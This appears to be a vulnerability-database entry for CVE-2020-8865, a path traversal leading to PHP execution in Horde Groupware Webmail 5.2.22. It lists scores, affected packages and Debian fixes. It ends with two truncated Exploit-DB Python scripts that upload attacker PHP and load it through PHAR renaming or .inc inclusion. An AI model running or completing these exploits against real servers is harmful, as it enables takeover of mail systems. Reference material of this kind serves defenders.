CVE-2020-8865
Published: 2020-03-23
Priority: P3 · 53 · medium · 6.3 · CVSS 3.1
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
EXPLOIT
EPSS: 6.81% (93.2nd percentile)
This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within edit.php. When parsing the params[template] parameter, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10469.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | php-horde-trean | < php-horde-trean 1.1.10-1 (bookworm) | php-horde-trean 1.1.10-1 (bookworm) |
| horde | groupware | — | — |
| horde | groupware_webmail_edition | — | — |
CVSS provenance
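| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.3 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| nvd | v3.0 | 6.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L |
| nvd | v2.0 | 6.5 | MEDIUM | AV:N/AC:L/Au:S/C:P/I:P/A:P |
| osv | — | 6.3 | MEDIUM | — |
| vendor_debian | — | 6.3 | MEDIUM | — |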
GHSA
GHSA-ggc2-fj6j-c7cc: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
ghsa_unreviewed·2022-05-24
CVE-2020-8865 [MEDIUM] CWE-22 GHSA-ggc2-fj6j-c7cc: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
OSV
CVE-2020-8865: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
osv·2020-03-23·CVSS 6.3
CVE-2020-8865 [MEDIUM] CVE-2020-8865: This vulnerability allows remote attackers to execute local PHP files on affected installations of Horde Groupware Webmail Edition 5
Debian
CVE-2020-8865: php-horde-trean - This vulnerability allows remote attackers to execute local PHP files on affecte...
vendor_debian·2020·CVSS 6.3
CVE-2020-8865 [MEDIUM] CVE-2020-8865: php-horde-trean - This vulnerability allows remote attackers to execute local PHP files on affecte...
Scope: local
bookworm: resolved (fixed in 1.1.10-1)
bullseye: resolved (fixed in 1.1.10-1)
sid: resolved (fixed in 1.1.10-1)
No detection rules found.
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
exploitdb·2020-03-11
CVE-2020-8866 Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
---
```python
## exploit-phar-loading.py
#!/usr/bin/env python3
from horde import Horde
import requests
import subprocess
import sys

TEMP_DIR = '/tmp'
WWW_ROOT = '/var/www/html'

if len(sys.argv) ')
    sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]

source = '{}/{}.phar'.format(TEMP_DIR, filename)
destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
temp = 'temp.phar'
url = '{}/static/{}.php'.format(base_url, filename)

# log into the web application
horde = Horde(base_url, username, password)

# create a PHAR that performs a rename when loaded and runs the payload when executed
subprocess.run([
    'php', 'create-renaming-phar.php'
```
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
exploitdb·2020-03-11
CVE-2020-8866 Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
---
```python
## exploit-inc-inclusion.py
#!/usr/bin/env python3
from horde import Horde
import subprocess
import sys

TEMP_DIR = '/tmp'

if len(sys.argv) ')
    sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]

# log into the web application
horde = Horde(base_url, username, password)

# upload (delete manually) and evaluate the .inc file
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF

## horde.py
import re
import requests

class Horde():
    def __init__(self, base_url, username, password):
        self.base_url = base_url
        self.username = use
```
No writeups or analysis indexed.
Published: 2020-03-23